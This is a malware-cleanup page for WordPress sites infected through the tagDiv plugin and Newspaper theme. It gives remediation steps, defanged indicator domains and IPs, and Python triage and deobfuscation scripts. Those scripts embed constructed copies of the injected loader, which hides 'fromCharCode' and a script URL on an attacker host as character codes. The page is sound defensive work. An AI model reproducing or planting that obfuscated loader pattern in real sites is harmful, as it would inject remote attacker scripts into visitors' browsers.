How to Clean getmygateway.com & playerofsunshine.com Malware

According to the PublicWWW source-code search engine, approximately 81,513 sites run the Newspaper theme together with the tagDiv plugin; more than 4,600 of them still show signs of infection.

MAGEFIX SecurityMalware cleanup & protection

Try our Free site check.

How to clean a website affected by tagDiv and Newspaper vulnerabilities.

  1. Back up the infected site first, database and web files included. Keep everything, suspicious files too: they are your record of what happened and are needed for the cross-site check later.
  2. Reinstall WordPress core, plugins and themes from their official sources, one by one and by hand. Do not copy any file back from the backup; start fresh. Remove any plugin folder you did not install yourself (the indicators below list wp-zexit and wp-swamp). wp-config.php may be restored after you have read through it and confirmed it holds only your own configuration; rotate the database credentials and salts it contains while you are at it.
  3. Make sure wp-content/uploads/ contains only media: search it for .php and .zip files and delete them. Nothing under uploads should ever be executable.
  4. Once the site works again, open the dashboard and remove every administrator account you did not create, then change the passwords of the accounts that remain.
  5. Back up and review the wp_options table. On affected sites it contains the injected, obfuscated script (in the tagDiv tdw-css-placeholder option, see below). Find and remove every malicious injection.
  6. Apply all available security updates for core, plugins and the Newspaper theme, and run PHP version 7.4 or greater.
  7. Use Search Replace DB version 4.1.3 to replace the malicious code inside wp_options when there are too many rows to edit by hand; the tool rewrites serialized values correctly, which a plain SQL UPDATE would corrupt.
  8. Scan every other site hosted on the same server for cross-site contamination. If another site is affected, isolate it and repeat the whole cleanup for it.
  9. When the site is clean, request a reindex via Google Search Console.
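The uploads check and the wp_options review from the list above can be scripted. The following Python script is an added example written for this page, not MageFix's, tagDiv's or WordPress's own code. It walks an uploads directory for files with executable or archive extensions and scans wp_options rows for the domains in the IOC list below and for the markers of the injected loader. The site tree and the option rows it scans are constructed inside the script so it runs offline; the IOC domain list and the `'fr'+'om'` marker come from this page, everything else (file names, option values, the charcode-run heuristic) is the example's own assumption.

```python
"""Triage helper for the uploads and wp_options checks in the cleanup list above.

Added example for this page (not MageFix's, tagDiv's or WordPress's own code).
The site tree and the wp_options rows it scans are constructed here so the
script runs offline; on a real site point scan_uploads() at wp-content/uploads
and feed scan_options() the rows from
    SELECT option_name, option_value FROM wp_options;
"""
import os
import re
import tempfile

# Extensions that should never sit under uploads: PHP will execute the first
# group, and .zip is how the dropper archive (zexit.zip) shows up.
SUSPICIOUS_EXT = {".php", ".phtml", ".php5", ".php7", ".phar", ".zip"}

# Registrable domains from the page's IOC list; matching on these catches every
# subdomain the injector rotates through (good., best., normal., ...).
IOC_DOMAINS = [
    "selectofmychoices.com", "getmygateway.com", "statisticplatform.com",
    "playerofsunshine.com", "statisticscripts.com",
    "gybritanalytsesystem.com", "streamfastcdn.com",
]

# Markers of the injected loader, each with a label for the report:
# the split-up 'fr'+'om'+String.fromCharCode method name quoted on the page,
# any <script> tag (custom CSS has no business containing one), and a long run
# of comma-separated character codes, which is how such loaders hide their URLs
# (the 20-number threshold is this example's own choice).
OBFUSCATION_MARKERS = [
    ("split-fromCharCode", re.compile(r"'fr'\s*\+\s*'om'\s*\+\s*String\.fromCharCode")),
    ("script-tag", re.compile(r"<script\b", re.I)),
    ("charcode-run", re.compile(r"(?:\b\d{2,3}\s*,\s*){20,}")),
]


def scan_uploads(uploads_dir):
    """Return paths (relative to uploads_dir) whose extension is suspicious."""
    hits = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            if os.path.splitext(name)[1].lower() in SUSPICIOUS_EXT:
                hits.append(os.path.relpath(os.path.join(root, name), uploads_dir))
    return sorted(hits)


def scan_options(rows):
    """rows: iterable of (option_name, option_value). Return one finding per hit row."""
    findings = []
    for name, value in rows:
        reasons = set()
        for dom in IOC_DOMAINS:
            if dom in value:
                reasons.add("ioc-domain:" + dom.replace(".", "[.]"))  # defanged for the report
        for label, rx in OBFUSCATION_MARKERS:
            if rx.search(value):
                reasons.add("obfuscation:" + label)
        if reasons:
            findings.append({"option_name": name, "reasons": sorted(reasons)})
    return findings


def run_triage(uploads_dir, option_rows):
    """Run both checks and return the report as plain data (easy to assert on or serialise)."""
    return {"uploads": scan_uploads(uploads_dir), "options": scan_options(option_rows)}


# --- constructed sample data (not from a real site) --------------------------

def build_sample_site():
    """Create a throwaway wp-content/uploads tree with one clean and two bad files."""
    base = tempfile.mkdtemp(prefix="wp-triage-")
    uploads = os.path.join(base, "wp-content", "uploads")
    os.makedirs(os.path.join(uploads, "2023", "09"))
    for rel, body in {
        "2023/09/banner.jpg": b"\xff\xd8\xff\xe0 not really a jpeg",
        "2023/09/zexit.zip": b"PK\x03\x04 stand-in for the dropper archive",
        "2023/09/.cache.php": b"<?php /* stand-in for a dropped PHP file */ ?>",
    }.items():
        with open(os.path.join(uploads, rel), "wb") as fh:
            fh.write(body)
    return uploads


SAMPLE_OPTIONS = [
    ("siteurl", "https://example.com"),
    # Mimics the injected loader: split method name plus a char-code list that
    # spells https://good.playerofsunshine.com (one of the page's IOCs).
    ("tdw-css-placeholder",
     "<script>var a=String['fr'+'om'+String.fromCharCode(67)+'harCode'];"
     "var u=a(104,116,116,112,115,58,47,47,103,111,111,100,46,112,108,97,121,"
     "101,114,111,102,115,117,110,115,104,105,110,101,46,99,111,109);</script>"),
    ("widget_custom_html",
     '<script src="https://cdn.statisticscripts.com/stats/get.js"></script>'),
    ("blogdescription", "Just another WordPress site"),
]

if __name__ == "__main__":
    report = run_triage(build_sample_site(), SAMPLE_OPTIONS)
    for path in report["uploads"]:
        print("uploads: remove", path)
    for finding in report["options"]:
        print("wp_options:", finding["option_name"], "->", ", ".join(finding["reasons"]))
```

The charcode-run heuristic is deliberately loose: a wp_options row that legitimately holds twenty comma-separated numbers is rare, and a false positive costs a minute of review, while a missed loader costs a reinfection. For the core-file check, WP-CLI's `wp core verify-checksums` and `wp plugin verify-checksums` compare every shipped file against the official manifest, which is faster and more reliable than eyeballing file names.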

If you seek professional help with cleanup and security updates, check our Platinum plan.
https://members.magefix.com/product/platinum/

Malicious URLs (defanged):
hxxps://where.selectofmychoices[.]com/scripts/step.js
hxxps://gate.getmygateway[.]com/select
hxxps://west.statisticplatform[.]com/stats
hxxps://good.playerofsunshine[.]com/scripts/start.js
hxxps://good.playerofsunshine[.]com/scripts/post.js
hxxps://normal.playerofsunshine[.]com/scripts/start.js
hxxps://cdn.statisticscripts[.]com/stats/get.js
hxxps://here.selectofmychoices[.]com/scripts/get.js
hxxps://try.selectofmychoices[.]com/script/start.js
hxxps://best.playerofsunshine[.]com/scripts/cdn.js
hxxps://fourth.gybritanalytsesystem[.]com/scripts/start.js
hxxps://fifth.gybritanalytsesystem[.]com/script/step.js
hxxps://content.streamfastcdn[.]com

Malicious IPs (defanged): 185.39.206[.]161, and the range 80.66.79[.]247 to 80.66.79[.]253 (Hyper Hosting SRL).

Malicious subdomains, grouped by the IP they resolved to (defanged; a hostname listed under two IPs was seen resolving to both):

80.66.79[.]247
call.getsmallcount[.]com
get.statisticplatform[.]com
got.statisticplatform[.]com
come.statisticplatform[.]com
bee.selectofmychoices[.]com
best.playerofsunshine[.]com
fourth.gybritanalytsesystem[.]com
was.selectofmychoices[.]com
where.selectofmychoices[.]com
normal.playerofsunshine[.]com
good.playerofsunshine[.]com
try.selectofmychoices[.]com
great.playerofsunshine[.]com
third.gybritanalytsesystem[.]com
here.selectofmychoices[.]com
second.gybritanalytsesystem[.]com
fifth.gybritanalytsesystem[.]com
first.gybritanalytsesystem[.]com
excelent.playerofsunshine[.]com

80.66.79[.]248
west.statisticplatform[.]com
goto.betradingway[.]com
give.selectchoise[.]com
north.statisticplatform[.]com
got.selectchoise[.]com
startup.betradingway[.]com

80.66.79[.]249
special.beatifulllhistory[.]com

80.66.79[.]250
store.bestselllerservice[.]com

80.66.79[.]251
follow.forwardstarlight[.]com
stay.forwardstarlight[.]com
west.statisticplatform[.]com

80.66.79[.]252
get.promsmotion[.]com
show.bridgelinering[.]com
net.promsmotion[.]com
go.bridgelinering[.]com

80.66.79[.]253
gate.getmygateway[.]com
get.lightsteper[.]com
cdn.specialtaskevents[.]com
page.specialnewspaper[.]com

fromCharCode obfuscated code inside tdw-css-placeholder (the tagDiv custom-CSS option in wp_options); the injected loader begins with:
['fr'+'om'+String.fromCharCode(67
The script assembles the method name "fromCharCode" from the pieces 'fr', 'om' and String.fromCharCode(67) (character code 67 is "C") and looks it up with bracket notation, so the literal string fromCharCode that a simple grep or signature would key on never appears in the payload. When reviewing the option, search for 'fr'+'om' and for long comma-separated lists of numbers rather than for the method name itself.
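To see how the split method name resolves, the following Python decoder is an added example for this page (not MageFix's code and not the real payload). It rewrites the obfuscated JavaScript textually, never executes it, and the two samples it decodes are constructed here to reproduce the pattern quoted above together with the numeric character-code lists such loaders use for their URLs; the hostname spelled out in the samples is one of the page's IOCs, everything else about them is assumed.

```python
"""Static decoder for the split "fromCharCode" loader quoted above.

Added example for this page, not the page's own code and not the real payload:
the two samples below are constructed to reproduce the pattern the page quotes
(['fr'+'om'+String.fromCharCode(67 ...) together with the numeric char-code
lists such loaders use for their URLs. The JavaScript is rewritten textually,
never executed, so the decoder is safe to run over a wp_options dump.
"""
import re

# 'ab'+'cd'  (single- or double-quoted literals joined by +; escapes allowed inside)
CONCAT = re.compile(r"""(['"])((?:\\.|(?!\1).)*)\1\s*\+\s*(['"])((?:\\.|(?!\3).)*)\3""")
# String.fromCharCode(104,116,...) with purely numeric arguments
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)")
# obj['name']  ->  obj.name once the property name has collapsed to one literal
BRACKET = re.compile(r"""\[(['"])([A-Za-z_$][\w$]*)\1\]""")
# var x=String.fromCharCode;  so that later x(...) calls can be decoded as well
ALIAS = re.compile(r"\bvar\s+([A-Za-z_$][\w$]*)\s*=\s*String\.fromCharCode\s*;")


def _unquote(body):
    """Drop the backslash from \\' \\" \\\\ escapes (enough for this loader)."""
    return re.sub(r"\\(.)", r"\1", body)


def _js_quote(text):
    """Re-emit text as a single-quoted JavaScript literal."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def deobfuscate(js, max_passes=50):
    """Apply the rewrite rules until nothing changes (or max_passes is reached)."""
    for _ in range(max_passes):
        # 1. numeric fromCharCode calls become string literals
        new = FROMCHARCODE.sub(
            lambda m: _js_quote("".join(chr(int(n)) for n in m.group(1).split(","))), js)
        # 2. adjacent literals joined with + are merged (one pair per pass)
        new = CONCAT.sub(lambda m: _js_quote(_unquote(m.group(2)) + _unquote(m.group(4))), new)
        # 3. obj['literal'] becomes obj.literal, which exposes String.fromCharCode
        new = BRACKET.sub(r".\2", new)
        # 4. calls through an alias of String.fromCharCode are rewritten to the real thing
        for alias in ALIAS.findall(new):
            new = re.sub(r"\b" + re.escape(alias) + r"\s*\(", "String.fromCharCode(", new)
        if new == js:
            break
        js = new
    return js


def extract_urls(js):
    """URLs visible in the (decoded) source, in order of appearance."""
    return re.findall(r"""https?://[^\s'"<>)]+""", js)


# --- constructed samples (not the real injection) ----------------------------

# "script" and the URL are hidden as char-code lists, and fromCharCode itself is
# spelt in pieces, exactly the trick the fragment above shows.
SAMPLE = (
    "var s=document.createElement(String['fr'+'om'+String.fromCharCode(67)+'harCode']"
    "(115,99,114,105,112,116));"
    "s.src=String['fr'+'om'+String.fromCharCode(67)+'harCode'](104,116,116,112,115,58,47,47,"
    "103,111,111,100,46,112,108,97,121,101,114,111,102,115,117,110,115,104,105,110,101,"
    "46,99,111,109,47,115,99,114,105,112,116,115,47,115,116,97,114,116,46,106,115);"
    "document.head.appendChild(s);"
)

# Same trick, with the resolved method parked in a variable first.
SAMPLE_ALIAS = (
    "var a=String['fr'+'om'+String.fromCharCode(67)+'harCode'];"
    "var u=a(104,116,116,112,115,58,47,47,103,111,111,100,46,112,108,97,121,101,114,"
    "111,102,115,117,110,115,104,105,110,101,46,99,111,109);"
)

if __name__ == "__main__":
    for sample in (SAMPLE, SAMPLE_ALIAS):
        decoded = deobfuscate(sample)
        print(decoded)
        for url in extract_urls(decoded):
            print("  loads:", url.replace(".", "[.]"))
```

Each pass only merges one pair of literals per chain, so 'fr'+'om'+'C'+'harCode' takes two passes to collapse; the fixed-point loop is what makes the order of the tricks irrelevant. A decoder like this is only for reading a dump you already know is malicious: it does not replace removing the row, and it will not follow code that builds strings through arithmetic or array joins.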

Malicious files & plugin folders: zexit.zip, wp-zexit, wp-swamp.
Core paths to check: wp-admin/js/custom-header.js, wp-includes/script-loader.js, wp-includes/js/wp-custom-header.js. The first and the last are legitimate WordPress files that the injector modifies, so compare them against the official checksums of your exact WordPress version rather than judging by name. Stock WordPress ships no wp-includes/script-loader.js (its loader is script-loader.php), so that file is dropped by the malware and can be removed outright.

Reddit: "wp-zexit", posted by u/cdbessig in r/WordPress

Sucuri SiteCheck detections:
Malware Found, Known javascript malware: malware.injection?35.54
Known malware: malware.injection?35.59

How this malware works: see the Sucuri write-up "Balada Injector Targets Unpatched tagDiv Plugin, Newspaper Theme & WordPress Admins".

Twitter @500mk500

Decoded malware
